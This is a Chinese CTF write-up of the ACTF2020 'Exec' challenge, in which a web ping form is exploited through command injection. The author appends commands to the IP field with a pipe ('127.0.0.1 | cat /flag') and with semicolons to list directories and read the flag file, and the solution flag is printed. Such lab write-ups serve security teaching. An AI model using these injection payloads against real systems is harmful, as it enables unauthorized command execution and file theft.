[ACTF2020 新生赛]Exec 1

题目环境:
[ACTF2020 新生赛]Exec 1_第1张图片
是一个ping操作,ping个127.0.0.1试试
有回显结果
[ACTF2020 新生赛]Exec 1_第2张图片
看起来有点像PWN的题,猜测通过列出目录文件,是否存在flag文件,并查看文件内容,并且存在两种方法解题,一种是管道符,一种是堆叠查询

第一种、管道符

列出目录文件
127.0.0.1 | ls
[ACTF2020 新生赛]Exec 1_第3张图片
列出隐藏文件
127.0.0.1 | ls -a
发现存在上级目录
[ACTF2020 新生赛]Exec 1_第4张图片
因此可以看出,此处命令执行并不是在root/根目录下进行的
列出/根目录下的目录文件
127.0.0.1 | ls /

[ACTF2020 新生赛]Exec 1_第5张图片
存在flag,查看根目录下flag文件的内容
127.0.0.1 | cat /flag
[ACTF2020 新生赛]Exec 1_第6张图片
得出flag:
**flag{ce0a3875-bc2a-49f9-b285-dccdf195531b}**

第二种、堆叠查询

列出当前目录文件;列出隐藏文件;列出根目录下的文件;查看根目录下flag文件的内容
127.0.0.1;ls;ls -a;ls /;cat /flag
[ACTF2020 新生赛]Exec 1_第7张图片
得出flag:
**flag{ce0a3875-bc2a-49f9-b285-dccdf195531b}**
两种方法可以看出有明显的不同

你可能感兴趣的:(CTF做题笔记,linux,运维,服务器,web安全,网络安全)